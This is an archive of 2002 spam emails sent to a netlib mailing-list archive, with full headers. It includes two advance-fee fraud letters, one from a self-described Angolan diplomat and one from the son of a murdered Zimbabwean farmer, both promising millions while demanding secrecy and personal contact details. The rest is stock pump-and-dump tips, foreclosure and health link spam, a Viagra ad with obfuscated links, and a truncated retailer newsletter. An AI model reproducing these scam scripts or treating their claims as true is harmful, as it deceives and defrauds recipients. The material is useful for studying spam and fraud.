<p align="center"><img border="0" src="http://www.4bfif78gt5ybtfp94w786yt53ytbigiiugey9875y36tuhw.com/stopwatch01.gif"></p>
<p align="left">&nbsp;</p>
<p align="left">&nbsp;</p>
<p align="center"><font size="2">I no longer wish to receive your newsletter <a href="mailto:notforme2002@themail.com?subject=takeoff"><b>click here</b></a></font></p>
</body>
</html>

orwrsjigfaxdlmara

From john_cabora@mail.com Mon Nov 11 06:37:27 2002
Return-Path: <john_cabora@mail.com>
Received: from 46.38.10.11 ([62.166.232.22])
	by netlib2.cs.utk.edu (8.12.3/8.12.3) with SMTP id gABBbPZ5001755
	for <blast-funct-archive@netlib2.cs.utk.edu>; Mon, 11 Nov 2002 06:37:26 -0500 (EST)
Message-Id: <200211111137.gABBbPZ5001755@netlib2.cs.utk.edu>
From: john cabora <john_cabora@mail.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Reply-To: john._cabora1@mail.com
Subject: Hon Dr John Cabora
Date: Mon, 11 Nov 2002 12:38:11 +0100
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="1c4b9860-4d3a-4492-b8d3-59ebd60d191f"


This is a multi-part message in MIME format
--1c4b9860-4d3a-4492-b8d3-59ebd60d191f
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: quoted-printable

FROM: THE DESK HON DR John cabora

> Dear Sir,

A Brief  Intreduction of my self, I am hon  Dr John
cabora. A diplomant from the republic Angola, also the owner of trans =
Atlantic crossing company.

> I am contacting in respect of your consignment /fund that is with me as a =
diplomat I don`t have problem in bringing the diplomatic cargo box containing =
the fund to you in the united states or any  country of your choice,My =
diplomatic licence will cover that also.There is a good diplomatic relation =
between my country and the united states or other country in the world.
 
     I  Want you to do this immediately:
> 1] Send to me your complete name,Address were the diplomatic cargo boxs =
containing the fund will be delivered.

> 2] I don`t  want you to inform any body about this transation till the fund =
is in your hands.if you do i will wash my hands away from the transaction and =
you will never get the fund
.And send me your  fax and phone number it will be necessary for this =
transaction.

 Please contact me on fax 0031-20-402-0634.
Regards
Hon Dr John Cabora  
--1c4b9860-4d3a-4492-b8d3-59ebd60d191f--


From tommynewman232@hotmail.com Tue Nov 12 19:59:44 2002
Return-Path: <tommynewman232@hotmail.com>
Received: from hotmail.com (f88.sea2.hotmail.com [207.68.165.88])
	by netlib2.cs.utk.edu (8.12.3/8.12.3) with ESMTP id gAD0xhZ5024760;
	Tue, 12 Nov 2002 19:59:43 -0500 (EST)
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC;
	 Tue, 12 Nov 2002 17:00:20 -0800
Received: from 213.39.30.2 by sea2fd.sea2.hotmail.msn.com with HTTP;
	Wed, 13 Nov 2002 01:00:20 GMT
X-Originating-IP: [213.39.30.2]
From: "tommy newman" <tommynewman232@hotmail.com>
To: ftosuccesssafelist@yahoogroups.com
Subject: tommy newman
Date: Wed, 13 Nov 2002 02:00:20 +0100
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-ID: <F88WGEc4HqygVjVNq7E0000c537@hotmail.com>
X-OriginalArrivalTime: 13 Nov 2002 01:00:20.0550 (UTC) FILETIME=[09F19660:01C28AB0]








CONFIDENTIAL BUSINESS PROPOSAL

dear sir

You may be suprise to receive this letter from me since you dont know me 
personally.  The purpose of my introduction is that I am tommy  newman  
first son of  maloco newman the most popular farmer in Zimbabwe who was 
recently murdered in the land dispute in my country


I got your contact through network online hence decide to write you. Before 
the death of my father, he had taken me to Johannesburg to deposit the sum 
of US$25,000,000.00[ thwenty  five million united states of America 
dollars]in one security company as he forsaw the coming danger  in zimbabwe


   This money was deposited in a box as gemstones in to avoid much demurage 
from the security company.This amount was meart for the purchase of new 
machines and chemicals for the new farm and establishment in Swiztland

This land problems came when Zimbawean president ROBERT MUGABE introduced a 
new land act reform who holly affected the rich white farmers and some few 
black farmers. And this resulted to the killing and mob action by Zimbabwe 
war returns and some lunatics in the society.

   It is against this background that I and my family fled Zimbabwe for fear 
of our lives and currently staying in The Netherlands where we seek 
political asylum and mooreso have decided to transfer my father' money to 
more reliable foreign account sinces the law of The netherland prohibits a 
refugee to open any bank account or to be involveed in any financial 
transaction throughout the territorial zone of Netherland .

     As the eldest son of my father , I am saddled to which the respobility 
of seeking a genuine foreign account where this money could be transfered 
without the the knowledge of my government who are bert on taking everything 
we have got.The South Africa government seems to be playing along with them. 
I am faced with the delima of moving this amount of money out of South 
Africa for fear of going through the same experience in future, both 
countries have similar political history. I am seeking for a partner who I 
have to entrust my future and family in his hand, I must let you know that 
this transaction is risk free.


   If you accept to assist me and my family , all I want you to do for me , 
is to arrange with the security company to clear the consignment (funds) 
from their afiliate office here in the Netherlands as I have already given 
directives for the consignment to be brought to The Netherlands from South 
Africa.   But before then all modalities will have to be put in place e.g 
change of ownership to the consignment and this money intend I intend to use 
for investment .


   I have two options for you , firstly you can choose to have certain 
percentage of the money or you can go into partnership with me for the 
proper profitable investment of the money in your country .  Which  ever the 
option you want , feel free to notify me. I have aslo mapped out 5% of the 
money for all kinds of expense incured in the process of this transaction. 
If you do not prefer a partnership I am willing to give you 15% of the money 
while the remaining 80% will be for my investment in your country.

    Contact me with the above email address while i imlore you to maintain 
the absolute secrecy required in this transaction. and your phone and fax 
number will be need for the transaction.

Thanks God bless you
tommy newman










_________________________________________________________________
Help STOP SPAM with the new MSN 8 and get 2 months FREE*  
http://join.msn.com/?page=features/junkmail


From Subscriber_Services78040@novaone.net Wed Nov 13 09:01:21 2002
Return-Path: <Subscriber_Services78040@novaone.net>
Received: from 210.83.134.186 ([210.83.134.186])
	by netlib2.cs.utk.edu (8.12.3/8.12.3) with SMTP id gADE1HZ5021507
	for <blast-funct-archive@netlib2.cs.utk.edu>; Wed, 13 Nov 2002 09:01:19 -0500 (EST)
Message-Id: <200211131401.gADE1HZ5021507@netlib2.cs.utk.edu>
Received: from unknown (26.113.85.29) by smtp4.cyberec.com with esmtp; Nov, 13 2002 7:47:30 AM -0200
Received: from [159.218.252.32] by n7.groups.yahoo.com with SMTP; Nov, 13 2002 6:35:50 AM +0700
Received: from unknown (153.188.246.130) by m10.grp.snv.yahoo.com with local; Nov, 13 2002 5:38:42 AM -0100
From: "WALL STREET BULLETIN..47270" <Subscriber_Services78040@novaone.net>
To: WALL.STREET.BULLETIN..46789
Cc: 
Subject: NEW STOCK PICK: PRCT - LAST PICK UP 150%......................................................................................................................................................................................................... wsj
Sender: "WALL STREET BULLETIN..47270" <Subscriber_Services78040@novaone.net>
Mime-Version: 1.0
Content-Type: text/html; charset="iso-8859-1"
Date: Wed, 13 Nov 2002 08:02:00 -0600
X-Mailer: Microsoft Outlook Build 10.0.2616
X-Priority: 1

<html>
<head>
</head>
<body>
<p align="center"><font style="font-size: 11pt" face="Courier">Did you miss out on NNCO, UP 233% IN JUST 2 DAYS?</font></p>
<p align="center"><font style="font-size: 11pt" face="Courier">Here's another pick - Another Short Play</font></p>
<p align="center"><b><a href="http://www.globalcyberconnection.com/Wall_Street_Bulletin.htm">CLICK HERE</a></b></p>
<p align="center"><img border="0" src="http://www.globalcyberconnection.com/stopwatch01.gif"></p>
<p align="left">&nbsp;</p>
<p align="left">&nbsp;</p>
<p align="center"><font size="2">I no longer wish to receive your newsletter <a href="mailto:notforme2002@themail.com?subject=takeoff"><b>click here</b></a></font></p>
</body>
</html>

hfuhdfsmsnixdlkcqvwnnrarrbfhf

From StopForeclosure99048@cari.net Mon Nov 18 23:55:04 2002
Return-Path: <StopForeclosure99048@cari.net>
Received: from 80.18.41.247 (host247-41.pool8018.interbusiness.it [80.18.41.247])
	by netlib2.cs.utk.edu (8.12.3/8.12.3) with SMTP id gAJ4t1Z5010307
	for <blast-funct-archive@netlib2.cs.utk.edu>; Mon, 18 Nov 2002 23:55:02 -0500 (EST)
Message-Id: <200211190455.gAJ4t1Z5010307@netlib2.cs.utk.edu>
Received: from unknown (70.133.86.252) by da001d2020.lax-ca.osd.concentric.net with esmtp; Nov, 18 2002 10:33:36 PM -0300
Received: from unknown (52.127.142.42) by rly-xl04.mx.aol.com with smtp; Nov, 18 2002 9:52:36 PM -0200
Received: from [46.224.35.15] by rly-xl04.mx.aol.com with smtp; Nov, 18 2002 8:53:55 PM -0100
Received: from mailout2-eri1.midsouth.rr.com ([110.220.177.171]) by rly-xr01.mx.aol.com with NNFMP; Nov, 18 2002 7:45:41 PM +0600
From: StopForeclosure940 <StopForeclosure99048@cari.net>
To: HOMEOWNER95967
Cc: 
Subject: STOP YOUR FORECLOSURE.............................................................................................................................................................................................. ieot
Sender: StopForeclosure940 <StopForeclosure99048@cari.net>
Mime-Version: 1.0
Content-Type: text/html; charset="iso-8859-1"
Date: Mon, 18 Nov 2002 23:00:00 -0600
X-Mailer: QUALCOMM Windows Eudora Version 5.1
X-Priority: 1

<html>
<head>
</head>
<body>
<p align="center"><img border="0" src="http://www.globalcyberconnection.net/SRLogo.gif"></p>
<p align="center"><b><a href="http://www.globalcyberconnection.net/SRCapital.htm">CLICK HERE</a></b></p>
<p align="left">&nbsp;</p>
<p align="center"><font size="2">Unsubscribe <a href="mailto:takemeoff1001@themail.com?subject=takeoff"><b>click here</b></a></font></p>
</body>
</html>

hmodycsvehlxyldglluxqxnlpyvlcmjkqpy

From HanschVonniederhaus@bolt.com Wed Nov 20 11:20:27 2002
Return-Path: <HanschVonniederhaus@bolt.com>
Received: from aelous.primus.ca (mx-backup.primus.ca [216.254.136.135])
	by netlib2.cs.utk.edu (8.12.3/8.12.3) with ESMTP id gAKGKQZ5022257
	for <blast-funct-archive@netlib2.cs.utk.edu>; Wed, 20 Nov 2002 11:20:27 -0500 (EST)
Received: from [216.254.175.82] (helo=216.254.175.82)
	by aelous.primus.ca with smtp (Exim 4.02)
	id 18EEGH-0004Ii-00; Tue, 19 Nov 2002 14:42:17 -0500
Reply-To: ykjuhy@yahoo.com@yahoo.com
Subject: VIAGRA works in up to 82% of patients (ry6w8v)
From: Carlberg Ruberto <CarlbergRuberto@bolt.com>
Date: Mon, 11 Nov 2002 20:53:55 -0600
To: Duranceau Standen <Shomer@icqmail.com>
X-Priority: 3 (Normal)
X-Accept-Language: en
X-Sender: "Carlberg Ruberto" <CarlbergRuberto@bolt.com>
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="5kJXf0iLtx---Minemindfxxyfh2P="
Content-Transfer-Encoding: 7bit
Message-Id: <E18EEGH-0004Ii-00@aelous.primus.ca>

--5kJXf0iLtx---Minemindfxxyfh2P=
Content-Transfer-Encoding: 7bit
Content-Type: text/html; charset="US-ASCII"

<CENTER>
<table border=2 cellspacing=0 cellpadding=3 width=500 bordercolor=#003584 bgcolor=D7EDFF>
<TR>
<TD ALIGN=CENTER VALIGN=middle>
<A HREF="http://w%77%77.%64i%73c%6Funt%2Dc%65n%74%72%61%6C-%6E%65%74%77or%6B%2E%63%6F%6D/5030" style="FONT-SIZE: 18px; TEXT-DECORATION: none; COLOR: #004971; FONT-FAMILY: Arial, Verdana, Helvetica;">
<B> Increase Your Sexual Performance Right Now! </B></A><BR>
<FONT style="FONT-SIZE: 15px; TEXT-DECORATION: none; COLOR: BLACK; FONT-FAMILY: Arial, Verdana, Helvetica;"> 
<I>Take control of your sex life, Order Viagra Online Now!</I><BR><BR>
The drug Viagra is a revolutionary way to treat impotence and enhance any man's sex life.
<BR><BR><A HREF="http://w%77%77.di%73co%75%6Et-%63e%6Et%72a%6C%2D%6Ee%74%77o%72%6B%2E%63om/5030" style="FONT-SIZE: 18px; TEXT-DECORATION: underline; COLOR: RED; FONT-FAMILY: Arial, Verdana, Helvetica;"><U><B>To order online click here</B></U></A><BR><BR>
<table border=0 cellspacing=3 cellpadding=2 width=490>
<TR>
<TD ALIGN=LEFT VALIGN=TOP WIDTH=30%>
<FONT style="FONT-SIZE: 14px; TEXT-DECORATION: none; COLOR: FF040B; FONT-FAMILY: Arial, Verdana, Helvetica;"> 
<IMG SRC=http://%77%77w%2Ec%6En%2E%63%6Fm/HEALTH/9902/11/jama.viagra.01/story.sex.signs.jpg>
</TD>
<TD ALIGN=LEFT VALIGN=TOP WIDTH=70%>
<FONT style="FONT-SIZE: 16px; TEXT-DECORATION: none; COLOR: BLACK; FONT-FAMILY: Arial, Verdana, Helvetica;"> 
The drug <B>Viagra</B> is a revolutionary way to treat impotence and enhance any man's sex life.<BR><BR><B>It is a Safe and Effective way to increase a man's libido</B> and has proven to be the most successful treatment for impotence.
</TD>
</TR>
<TR>
<TD ALIGN=LEFT VALIGN=middle WIDTH=100% COLSPAN=2>
<FONT style="FONT-SIZE: 16px; TEXT-DECORATION: none; COLOR: BLACK; FONT-FAMILY: Arial, Verdana, Helvetica;"> 
No need to go through embarrassing, stressful situations anymore, you can now get Viagra from the comfort of your home!<BR><BR>
<FONT style="FONT-SIZE: 17px; TEXT-DECORATION: none; COLOR: BLACK; FONT-FAMILY: Helvetica, Verdana, Helvetica;"> 
<B>Some Things to think about...</B><BR><BR>
<FONT style="FONT-SIZE: 15px; TEXT-DECORATION: none; COLOR: BLACK; FONT-FAMILY: Helvetica, Verdana, Helvetica;"> 
<B>1)</B> You will not get an erection without sexual stimulation - no need to be embarrassed like when you use other sexual stimulants. You will only gain an erection when you are sexually stimulated.<BR><BR>
<B>2)</B> More men use and trust Viagra as a treatment for sexual dysfunction than other sexual stimulation aids. Viagra is a safe sexual treatment that is proven because of the wide use and acceptance by the general public.<BR><BR>
<B>3)</B> When you use Viagra you are able to gain an erection through your partners sexual stimulation - all of your sexual acts, feelings and your love making is the result of your chemistry. <BR><BR>
<CENTER>
<FONT style="FONT-SIZE: 17px; TEXT-DECORATION: none; COLOR: #3C4355; FONT-FAMILY: Arial, Verdana, Helvetica;">
<B>This is the easiest and most discreet way to <BR>end impotence</B><BR><BR>
<A HREF="http://w%77%77.%64isco%75%6Et-c%65n%74r%61%6C-ne%74%77%6F%72%6B%2Ec%6Fm/5030" style="FONT-SIZE: 18px; TEXT-DECORATION: underline; COLOR: RED; FONT-FAMILY: Arial, Verdana, Helvetica;"><U><B>To order online click here</B></U></A><BR><BR>
<FONT style="FONT-SIZE: 16px; TEXT-DECORATION: none; COLOR: BLACK; FONT-FAMILY: Helvetica, Verdana, Helvetica;"> 
It's worked for so many don't waste any more time get started by following the link on this page!
</TD>
</TR>
</TABLE>
</TD>
</TR>
</TABLE>
<FONT style="FONT-SIZE: 10px; TEXT-DECORATION: none; COLOR: GRAY; FONT-FAMILY: Arial, Verdana, Helvetica;">
*** To be removed reply to this email ***
</CENTER>
OXJSFVpH0bw7R0d45x30m15pD08WaH1MP2

--5kJXf0iLtx---Minemindfxxyfh2P=--


From Subscriber_Services78036@idt.net Thu Nov 21 14:49:43 2002
Return-Path: <Subscriber_Services78036@idt.net>
Received: from 218.11.140.144 ([218.11.140.144])
	by netlib2.cs.utk.edu (8.12.3/8.12.3) with SMTP id gALJndZ5016486
	for <blast-funct-archive@netlib2.cs.utk.edu>; Thu, 21 Nov 2002 14:49:42 -0500 (EST)
Message-Id: <200211211949.gALJndZ5016486@netlib2.cs.utk.edu>
Received: from smtp-server6.tampabay.rr.com ([12.232.159.86]) by mailout2-eri1.midsouth.rr.com with asmtp; Nov, 21 2002 1:52:38 PM +1100
Received: from 36.185.61.158 ([36.185.61.158]) by f64.law4.hotmail.com with QMQP; Nov, 21 2002 12:44:24 PM +0600
Received: from 184.244.108.80 ([184.244.108.80]) by rly-xr02.mx.aol.com with SMTP; Nov, 21 2002 11:25:42 AM +0700
Received: from [130.91.58.120] by mta6.snfc21.pbi.net with SMTP; Nov, 21 2002 10:37:42 AM +0600
From: "WALL STREET BULLETIN..46249" <Subscriber_Services78036@idt.net>
To: WALL.STREET.BULLETIN..47404
Cc: blast-funct-archive@netlib2.cs.utk.edu,
   blast-lb-archive@netlib2.cs.utk.edu, blast-lite-archive@netlib2.cs.utk.edu,
   blast-parallel-archive@netlib2.cs.utk.edu,
   blast-sparse-archive@netlib2.cs.utk.edu
Subject: NEW STOCK PICK: TBIN - SYPY UP 309%....................................................................................................................................................................... mgb
Sender: "WALL STREET BULLETIN..46249" <Subscriber_Services78036@idt.net>
Mime-Version: 1.0
Content-Type: text/html; charset="iso-8859-1"
Date: Thu, 21 Nov 2002 13:53:48 -0600
X-Mailer: AOL 7.0 for Windows US sub 118
X-Priority: 1

<html>
<head>
</head>
<body>
<p align="center"><font style="font-size: 11pt" face="Courier">Did you miss out on SYPY, UP 309%?</font></p>
<p align="center"><font style="font-size: 11pt" face="Courier">Here's another pick - Another SHORT PLAY</font></p>
<p align="center"><b><a href="http://www.globalcyberconnection.com/Wall_Street_Bulletin.htm">CLICK HERE</a></b></p>
<p align="center"><img border="0" src="http://www.globalcyberconnection.com/stopwatch01.gif"></p>
<p align="left">&nbsp;</p>
<p align="left">&nbsp;</p>
<p align="center"><font size="2">I no longer wish to receive your newsletter <a href="mailto:notforme2002@themail.com?subject=takeoff"><b>click here</b></a></font></p>
</body>
</html>

kgoqybkngnjkcbctnfaujjxitqanqldhjpuwe

From Your_Health_Care_1252@aloha.net Sat Nov 23 01:04:21 2002
Return-Path: <Your_Health_Care_1252@aloha.net>
Received: from 210.184.45.242 ([210.184.45.242])
	by netlib2.cs.utk.edu (8.12.3/8.12.3) with SMTP id gAN64HZ5013939
	for <blast-funct-archive@netlib2.cs.utk.edu>; Sat, 23 Nov 2002 01:04:19 -0500 (EST)
Message-Id: <200211230604.gAN64HZ5013939@netlib2.cs.utk.edu>
Received: from unknown (HELO anther.webhostingtalk.com) (205.220.75.34) by asy100.as122.sol.superonline.com with smtp; Nov, 22 2002 11:48:16 PM +0700
Received: from unknown (148.179.169.246) by rly-yk05.mx.aol.com with QMQP; Nov, 22 2002 10:32:16 PM -0000
Received: from [135.12.72.250] by ssymail.ssy.co.kr with SMTP; Nov, 22 2002 9:43:26 PM -0800
Received: from [41.237.71.37] by f64.law4.hotmail.com with NNFMP; Nov, 22 2002 8:40:02 PM +0400
From: Your_Health_Care_264 <Your_Health_Care_1252@aloha.net>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: 
Subject: YOUR HEALTH CARE........................................................................................................................................................................... ahyip
Sender: Your_Health_Care_264 <Your_Health_Care_1252@aloha.net>
Mime-Version: 1.0
Content-Type: text/html; charset="iso-8859-1"
Date: Sat, 23 Nov 2002 00:00:27 -0600
X-Mailer: Microsoft Outlook Express 5.00.2615.200
X-Priority: 1

<html>
<head>
</head>
<body>
<p align="center"><img border="0" src="http://www.globalcyberconnection.org/HealthCare001_Logo(Small).gif"></p>
<p align="center"><b><a href="http://www.globalcyberconnection.org/HealthCare001.htm">CLICK HERE</a></b></p>
<p align="left">&nbsp;</p>
<p align="center"><font size="2">Unsubscribe <a href="mailto:anothertime10010@themail.com?subject=takeoff"><b>click here</b></a></font></p>
</body>
</html>

rwmcbrudkaqhgatkimgqf

From mike@micguys.com Fri Dec 13 05:32:25 2002
Return-Path: <mike@micguys.com>
Received: from 210west (lsanca1-ar7-4-42-121-159.lsanca1.dsl-verizon.net [4.42.121.159])
	by netlib2.cs.utk.edu (8.12.3/8.12.3) with SMTP id gBDAWKZ5000387
	for <blast-funct-archive@netlib2.cs.utk.edu>; Fri, 13 Dec 2002 05:32:20 -0500 (EST)
Message-Id: <200212131032.gBDAWKZ5000387@netlib2.cs.utk.edu>
From: "Mike " <mike@micguys.com>
To: <blast-funct-archive@netlib2.cs.utk.edu>
Subject: Home Studio
Mime-Version: 1.0
Content-Type: multipart/alternative; boundary="----=_NextPart_000_0034_01C221EC.6C64F7B0"
Date: Fri, 13 Dec 2002 02:32:03
Reply-To: "Mike " <mike@micguys.com>
X-Mailer: Microsoft Outlook Express 6.00.2600.0000

------=_NextPart_000_0034_01C221EC.6C64F7B0
Content-Type: text/plain;
        charset="iso-8859-1"

<!doctype html public "-//w3c//dtd html 4.0 transitional//en"> 
<html> 
<head> 
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> 
<meta name="GENERATOR" content="Mozilla/4.79 [en] (X11; U; Linux 2.4.18-17.8.0 i686) [Netscape]"> 
<title>Merry Christmas from MICGUYS.COM!</title> 
</head> 
<body text="#444444" bgcolor="#FFFFFF" link="#0000FF" vlink="#FF0000" alink="#990000"> 
<font face="verdana,geneva,arial,helvetica,sans-serif"><font size=-2>Instructions 
for how to be removed from this mailing list are available at the end of 
this message.</font></font> 
<br>&nbsp; 
<table BORDER=0 WIDTH="493" NOSAVE > 
<tr NOSAVE> 
<td WIDTH="100%" NOSAVE> 
<center><b><font face="Arial"><font color="#5E8BB7"><font size=+3>Micguys.com</font></font></font></b> 
<br><b><i><font face="Arial"><font color="#000000">"Bringing Affordable 
and Unique Microphones To The World!"</font></font></i></b> 
<br><b><font face="Arial"><font color="#5E8BB7"><font size=-1><a href="http://www.micguys.com">Microphones</a> 
/ <a href="http://www.micguys.com/accessories/acc_stands.htm">Stands</a> 
/ <a href="http://www.micguys.com/accessories/acc_miccables.htm">Mic Cables</a> 
/ <a href="http://www.micguys.com/">Monitors</a> / <a href="http://www.micguys.com/accessories/accessories.htm">Microphone 
Accessories</a> / <a href="http://www.micguys.com/">Pre Amps</a> / <a href="http://www.micguys.com/ps_audio/ps_audio.htm">A.C. 
Solutions</a></font></font></font></b></center> 
</td> 
</tr> 
</table> 
<center><table BORDER=0 CELLSPACING=0 CELLPADDING=0 WIDTH="100%" HEIGHT="20" NOSAVE > 
<tr NOSAVE> 
<td WIDTH="100%" NOSAVE> 
<br>&nbsp; 
<table BORDER=0 COLS=3 WIDTH="400" NOSAVE > 
<tr NOSAVE> 
<td NOSAVE> 
<center><img SRC="http://www.micguys.com/e-mail_blasts/ctree_6a.gif" NOSAVE height=106 width=70></center> 
</td> 
<td WIDTH="80%" NOSAVE> 
<center><b><font face="Arial"><font color="#009900"><font size=-1>HAPPY 
HOLIDAYS FROM MICGUYS.COM!</font></font></font></b></center> 
<p><b><font face="Arial"><font size=-1>Thanks for being&nbsp; part of the 
Micguys.com family!&nbsp; In an effort to better serve our customers needs,&nbsp; 
we are always on the lookout for new and unique products that we feel offer 
great value for the price. We are always adding new products so visit us 
often at&nbsp; <a href="http://www.micguys.com">Micguys.com</a>.</font></font></b></td> 
<td> 
<center><img SRC="http://www.micguys.com/e-mail_blasts/ctree_6a.gif" NOSAVE height=106 width=70></center> 
</td> 
</tr> 
</table> 
</td> 
</tr> 
</table></center> 
<br>&nbsp; 
<table BORDER=0 CELLSPACING=0 CELLPADDING=0 WIDTH="500" NOSAVE > 
<tr NOSAVE> 
<td WIDTH="100%" NOSAVE> 
<center><b><i><font color="#000000"><font size=+2>Musicians...&nbsp; Look 
At This Deal!</font></font></i></b></center> 
</td> 
</tr> 
</table> 
<table BORDER=0 CELLSPACING=0 WIDTH="495" BGCOLOR="#CCCC99" > 
<tr> 
<td WIDTH="495"> 
<table BORDER=0 CELLSPACING=0 CELLPADDING=4 WIDTH="493" BGCOLOR="#CCCC99" > 
<tr> 
<td ALIGN=LEFT VALIGN=TOP WIDTH="491" BGCOLOR="#FFFFFF"><img SRC="http://www.micguys.com/e-mail_blasts/tb1_mail2.jpg" NOSAVE height=300 width=87 align=LEFT><b><font color="#000000"><font size=+2><a href="http://www.micguys.com/studio_project_mics/spmics_tb1.htm">Studio 
Projects TB-1</a></font></font><font color="#FF0000"><font size=+1>&nbsp; 
$299.99</font></font></b> 
<br><b><i><font face="verdana,geneva,arial,helvetica,sans-serif"><font color="#000000"><font size=+1>Get 
That Warm Tube Sound At An Incredible Price!&nbsp;</font></font></font></i></b> 
<br><b><font face="verdana,geneva,arial,helvetica,sans-serif"><font color="#000000"><font size=-1>These 
mics are in high demand and are hard to find!&nbsp;</font></font></font></b> 
<br><b><font face="verdana,geneva,arial,helvetica,sans-serif"><font size=-1><font color="#000000">There 
is Limited Stock on hand, so </font><font color="#FF0000">Order Now!</font></font></font></b> 
<br><font face="Arial"><font size=-1>The TB1 is a vacuum tube (valve) microphone 
incorporating the philosophy that the best microphones use high quality, 
yet minimal components, along with hand selected tubes. Using the finest 
available materials to build the best possible capsule, the Studio Projects 
TB1 achieves this philosophy and more.&nbsp;</font></font><img SRC="http://www.micguys.com/e-mail_blasts/tb1_case_small.jpg" NOSAVE height=132 width=126 align=RIGHT> 
<blockquote><b><font color="#000000"><font size=-1>APPLICATIONS:</font></font></b> 
<br><font color="#000000"><font size=-1>* A superb vocal microphone with 
warm natural transparent character</font></font> 
<br><font color="#000000"><font size=-1>* Great for strings, pianos &amp; 
percussion</font></font> 
<br><font color="#000000"><font size=-1>* Great for production, broadcast, 
and voice over work</font></font> 
<br><font color="#000000"><font size=-1>* Perfect for the professional 
and home project studio&nbsp;</font></font> 
<br><b><font color="#000000"><font size=-1>SUPPLIED ACCESSORIES:</font></font></b> 
<br><font color="#000000"><font size=-1>* Foam windscreen</font></font> 
<br><font color="#000000"><font size=-1>* Mic Stand Clip</font></font> 
<br><font color="#000000"><font size=-1>* 7pin interface cable</font></font> 
<br><font color="#000000"><font size=-1>* Power supply</font></font> 
<br><font color="#000000"><font size=-1>* Aluminum carrying case</font></font></blockquote> 
</td> 
</tr> 
</table> 
</td> 
</tr> 
</table> 
<br>&nbsp; 
<table BORDER=0 CELLSPACING=0 WIDTH="495" BGCOLOR="#CCCC99" > 
<tr> 
<td WIDTH="495"> 
<table BORDER=0 CELLSPACING=0 CELLPADDING=4 WIDTH="493" BGCOLOR="#CCCC99" > 
<tr> 
<td ALIGN=LEFT VALIGN=TOP WIDTH="491" BGCOLOR="#FFFFFF"><b><font face="verdana,geneva,arial,helvetica,sans-serif"><font color="#000000"><font size=+2>Stocking 
Stuffers!</font></font></font></b> 
<br><b><font face="verdana,geneva,arial,helvetica,sans-serif"><font color="#000000">You 
Better Have Enough </font><font color="#FF0000">Cables!</font></font></b> 
<br><font face="verdana,geneva,arial,helvetica,sans-serif"><font color="#444444"><font size=-1><a href="http://www.micguys.com/accessories/acc_miccables.htm">We 
have a variety of cables in different lengths to help wire you up!&nbsp; 
(click here)</a></font></font></font> 
<p><b><font face="verdana,geneva,arial,helvetica,sans-serif"><font color="#000000">Got 
Enough Stands?</font></font></b> 
<br><font face="verdana,geneva,arial,helvetica,sans-serif"><font color="#000000"><font size=-1><a href="http://www.micguys.com/accessories/acc_stands.htm">Always 
be prepared with the stands necessary to mic any situation. Take a look 
at our selection of stands for a variety of applications.</a></font></font></font> 
<br>&nbsp;</td> 
</tr> 
</table> 
</td> 
</tr> 
</table> 
<br>&nbsp; 
<table BORDER=0 CELLSPACING=0 WIDTH="495" BGCOLOR="#CCCC99" > 
<tr> 
<td WIDTH="495"> 
<table BORDER=0 CELLSPACING=0 CELLPADDING=4 WIDTH="493" BGCOLOR="#CCCC99" > 
<tr> 
<td ALIGN=LEFT VALIGN=TOP WIDTH="491" BGCOLOR="#FFFFFF"><b><font face="verdana,geneva,arial,helvetica,sans-serif"><font color="#000000">Check 
out our great selection of other instrument mics:</font></font></b> 
<p><font face="verdana,geneva,arial,helvetica,sans-serif"><font color="#000000"><font size=-1><a href="http://www.micguys.com/marshall/marsh_603s.htm">Marshall 
603s</a> - a great overhead mic for drums or stringed instruments.</font></font></font> 
<br><font face="verdana,geneva,arial,helvetica,sans-serif"><font color="#000000"><font size=-1><a href="http://www.micguys.com/studio_project_mics/spmics_c1.htm">Studio 
Projects C1</a> - The new workhorse for the new millennium...</font></font></font> 
<br><font face="verdana,geneva,arial,helvetica,sans-serif"><font color="#000000"><font size=-1><a href="http://www.micguys.com/adk/adk_a-51.htm">ADK 
A51</a> - A large diaphragm condenser that will give Neumanns a run for 
their money.</font></font></font> 
<br><font face="verdana,geneva,arial,helvetica,sans-serif"><font color="#000000"><font size=-1><a href="http://www.micguys.com/blue/blue_mouse.htm">B.L.U.E. 
The Mouse</a> - Add a bit of flavor and style to your next recordings.</font></font></font> 
<p>&nbsp;</td> 
</tr> 
</table> 
</td> 
</tr> 
</table> 
<br>&nbsp; 
<table BORDER=0 CELLSPACING=0 WIDTH="495" BGCOLOR="#CCCC99" > 
<tr> 
<td WIDTH="495"> 
<table BORDER=0 CELLSPACING=0 CELLPADDING=4 WIDTH="493" BGCOLOR="#CCCC99" > 
<tr> 
<td ALIGN=LEFT VALIGN=TOP WIDTH="491" BGCOLOR="#FFFFFF"><font face="verdana,geneva,arial,helvetica,sans-serif"><font size=-2>If 
you wish to be removed from this mailing list, e-mail <a href="mailto:list@micguys.com">info@micguys.com</a> 
to be removed from the list.</font></font></td> 
</tr> 
</table> 
</td> 
</tr> 
</table> 
<br>&nbsp; 
<br>&nbsp; 
<br>&nbsp; 
</body> 
</html> 

------=_NextPart_000_0034_01C221EC.6C64F7B0
Content-Type: text/html;
        charset="iso-8859-1"

<!doctype html public "-//w3c//dtd html 4.0 transitional//en"> 
<html> 
<head> 
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> 
<meta name="GENERATOR" content="Mozilla/4.79 [en] (X11; U; Linux 2.4.18-17.8.0 i686) [Netscape]"> 
<title>Merry Christmas from MICGUYS.COM!</title> 
</head> 
<body text="#444444" bgcolor="#FFFFFF" link="#0000FF" vlink="#FF0000" alink="#990000"> 
<font face="verdana,geneva,arial,helvetica,sans-serif"><font size=-2>Instructions 
for how to be removed from this mailing list are available at the end of 
this message.</font></font> 
<br>&nbsp; 
<table BORDER=0 WIDTH="493" NOSAVE > 
<tr NOSAVE> 
<td WIDTH="100%" NOSAVE> 
<center><b><font face="Arial"><font color="#5E8BB7"><font size=+3>Micguys.com</font></font></font></b> 
<br><b><i><font face="Arial"><font color="#000000">"Bringing Affordable 
and Unique Microphones To The World!"</font></font></i></b> 
<br><b><font face="Arial"><font color="#5E8BB7"><font size=-1><a href="http://www.micguys.com">Microphones</a> 
